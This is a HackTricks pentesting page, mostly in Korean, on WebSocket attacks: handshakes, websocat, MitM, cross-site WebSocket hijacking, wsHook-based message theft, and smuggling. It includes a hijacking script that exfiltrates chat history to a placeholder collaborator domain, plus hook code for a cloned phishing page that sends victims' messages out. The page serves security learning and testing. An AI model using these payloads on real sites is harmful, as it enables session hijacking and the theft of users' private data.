13 KiB
WebSocket Attacks
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
What are WebSockets
WebSocket 연결은 초기 HTTP 핸드셰이크를 통해 설정되며, 장기 지속적으로 설계되어 언제든지 양방향 메시징을 가능하게 하여 거래 시스템이 필요하지 않습니다. 이는 WebSocket이 실시간 금융 데이터 스트림과 같은 저지연 또는 서버 시작 통신이 필요한 애플리케이션에 특히 유리하게 만듭니다.
Establishment of WebSocket Connections
WebSocket 연결을 설정하는 방법에 대한 자세한 설명은 여기에서 확인할 수 있습니다. 요약하자면, WebSocket 연결은 일반적으로 클라이언트 측 JavaScript를 통해 시작됩니다.
var ws = new WebSocket("wss://normal-website.com/ws");
wss
프로토콜은 TLS로 보호된 WebSocket 연결을 나타내고, ws
는 보안되지 않은 연결을 나타냅니다.
연결 설정 중에 브라우저와 서버 간에 HTTP를 통한 핸드셰이크가 수행됩니다. 핸드셰이크 과정은 브라우저가 요청을 보내고 서버가 응답하는 것으로 구성되며, 다음 예시에서 설명됩니다:
브라우저가 핸드셰이크 요청을 보냅니다:
GET /chat HTTP/1.1
Host: normal-website.com
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket
서버의 핸드셰이크 응답:
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=
연결이 설정되면 양방향으로 메시지 교환을 위해 열려 있습니다.
WebSocket 핸드셰이크의 주요 포인트:
Connection
및Upgrade
헤더는 WebSocket 핸드셰이크의 시작을 알립니다.Sec-WebSocket-Version
헤더는 원하는 WebSocket 프로토콜 버전을 나타내며, 일반적으로13
입니다.- Base64로 인코딩된 무작위 값이
Sec-WebSocket-Key
헤더에 전송되어 각 핸드셰이크가 고유하도록 보장하며, 이는 캐싱 프록시와 관련된 문제를 방지하는 데 도움이 됩니다. 이 값은 인증을 위한 것이 아니라 응답이 잘못 구성된 서버나 캐시에서 생성되지 않았음을 확인하기 위한 것입니다. - 서버의 응답에 있는
Sec-WebSocket-Accept
헤더는Sec-WebSocket-Key
의 해시로, WebSocket 연결을 열려는 서버의 의도를 검증합니다.
이러한 기능은 핸드셰이크 프로세스가 안전하고 신뢰할 수 있도록 보장하며, 효율적인 실시간 통신을 위한 길을 열어줍니다.
Linux 콘솔
websocat
을 사용하여 websocket과의 원시 연결을 설정할 수 있습니다.
websocat --insecure wss://10.10.10.10:8000 -v
웹소캣 서버를 생성하려면:
websocat -s 0.0.0.0:8000 #Listen in port 8000
MitM websocket connections
클라이언트가 현재 로컬 네트워크에서 HTTP websocket에 연결되어 있는 것을 발견하면, 클라이언트와 서버 간의 MitM 공격을 수행하기 위해 ARP Spoofing Attack을 시도할 수 있습니다.
클라이언트가 연결을 시도할 때, 다음을 사용할 수 있습니다:
websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
Websockets enumeration
You can use the tool https://github.com/PalindromeLabs/STEWS to discover, fingerprint and search for known vulnerabilities in websockets automatically.
Websocket Debug tools
- Burp Suite는 일반 HTTP 통신과 매우 유사한 방식으로 MitM websockets 통신을 지원합니다.
- The socketsleuth Burp Suite extension는 history를 가져오고, interception rules를 설정하며, match and replace 규칙을 사용하고, Intruder 및 AutoRepeater를 사용하여 Burp에서 Websocket 통신을 더 잘 관리할 수 있게 해줍니다.
- WSSiP: "WebSocket/Socket.io Proxy"의 약자로, Node.js로 작성된 이 도구는 클라이언트와 서버 간의 모든 WebSocket 및 Socket.IO 통신을 capture, intercept, send custom 메시지를 보내고 볼 수 있는 사용자 인터페이스를 제공합니다.
- wsrepl는 penetration testing을 위해 특별히 설계된 interactive websocket REPL입니다. 이는 incoming websocket messages를 관찰하고 새로운 메시지를 보내는 인터페이스를 제공하며, 이 통신을 automating하기 위한 사용하기 쉬운 프레임워크를 제공합니다.
- https://websocketking.com/는 websockets를 사용하여 다른 웹과 통신하는 web입니다.
- https://hoppscotch.io/realtime/websocket는 다른 유형의 통신/프로토콜 중에서 websockets를 사용하여 다른 웹과 통신하는 web을 제공합니다.
Websocket Lab
In Burp-Suite-Extender-Montoya-Course you have a code to launch a web using websockets and in this post you can find an explanation.
Cross-site WebSocket hijacking (CSWSH)
Cross-site WebSocket hijacking, 또한 cross-origin WebSocket hijacking으로 알려진 이 공격은 WebSocket 핸드셰이크에 영향을 미치는 특정한 경우의 **Cross-Site Request Forgery (CSRF)**로 식별됩니다. 이 취약점은 WebSocket 핸드셰이크가 CSRF tokens 또는 유사한 보안 조치 없이 오직 HTTP cookies를 통해 인증될 때 발생합니다.
공격자는 취약한 애플리케이션에 대한 교차 사이트 WebSocket 연결을 시작하는 악성 웹 페이지를 호스팅하여 이를 악용할 수 있습니다. 결과적으로 이 연결은 애플리케이션과의 피해자의 세션의 일부로 간주되며, 세션 처리 메커니즘에서 CSRF 보호가 부족한 점을 악용합니다.
Simple Attack
websocket 연결을 establishing할 때 cookie가 서버로 전송된다는 점에 유의하십시오. 서버는 이를 사용하여 전송된 cookie를 기반으로 각 특정 사용자와 그의 websocket 세션을 연관시킬 수 있습니다.
그런 다음, 예를 들어 websocket 서버가 사용자의 대화 history를 전송하는 경우, "**READY"**라는 메시지가 전송되면, simple XSS를 통해 연결을 설정하면 (이때 cookie는 피해자 사용자를 인증하기 위해 자동으로 전송됩니다) "READY"를 전송하여 대화의 history를 가져올 수 있습니다.
<script>
websocket = new WebSocket('wss://your-websocket-URL')
websocket.onopen = start
websocket.onmessage = handleReply
function start(event) {
websocket.send("READY"); //Send the message to retreive confidential information
}
function handleReply(event) {
//Exfiltrate the confidential information to attackers server
fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
}
</script>
Cross Origin + Cookie with a different subdomain
이 블로그 게시물 https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/에서 공격자는 웹 소켓 통신이 발생하는 도메인의 서브도메인에서 임의의 Javascript를 실행하는 데 성공했습니다. 서브도메인이었기 때문에 쿠키가 전송되었고, Websocket이 Origin을 제대로 확인하지 않았기 때문에, 이를 통해 통신하고 토큰을 훔치는 것이 가능했습니다.
Stealing data from user
당신이 가장하고 싶은 웹 애플리케이션을 복사하세요 (예: .html 파일) 그리고 웹소켓 통신이 발생하는 스크립트 안에 이 코드를 추가하세요:
//This is the script tag to load the websocket hooker
<script src='wsHook.js'></script>
//These are the functions that are gonig to be executed before a message
//is sent by the client or received from the server
//These code must be between some <script> tags or inside a .js file
wsHook.before = function(data, url) {
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "client_msg?m="+data, true);
xhttp.send();
}
wsHook.after = function(messageEvent, url, wsObject) {
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "server_msg?m="+messageEvent.data, true);
xhttp.send();
return messageEvent;
}
이제 https://github.com/skepticfx/wshook에서 wsHook.js
파일을 다운로드하고 웹 파일이 있는 폴더에 저장하세요.
웹 애플리케이션을 노출시키고 사용자가 연결하게 하면 websocket을 통해 전송된 메시지와 수신된 메시지를 훔칠 수 있습니다:
sudo python3 -m http.server 80
Race Conditions
WebSockets의 Race Conditions도 존재합니다, 더 알아보려면 이 정보를 확인하세요.
Other vulnerabilities
Web Sockets는 서버 측과 클라이언트 측에 데이터를 전송하는 메커니즘이므로, 서버와 클라이언트가 정보를 처리하는 방식에 따라, Web Sockets는 웹 소켓의 사용자 입력을 사용하여 XSS, SQLi 또는 기타 일반적인 웹 취약점을 악용하는 데 사용될 수 있습니다.
WebSocket Smuggling
이 취약점은 웹소켓 통신이 설정되었다고 믿게 하여 리버스 프록시 제한을 우회할 수 있게 할 수 있습니다 (사실이 아니더라도). 이는 공격자가 숨겨진 엔드포인트에 접근할 수 있게 할 수 있습니다. 더 많은 정보는 다음 페이지를 확인하세요:
{% content-ref url="h2c-smuggling.md" %} h2c-smuggling.md {% endcontent-ref %}
References
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.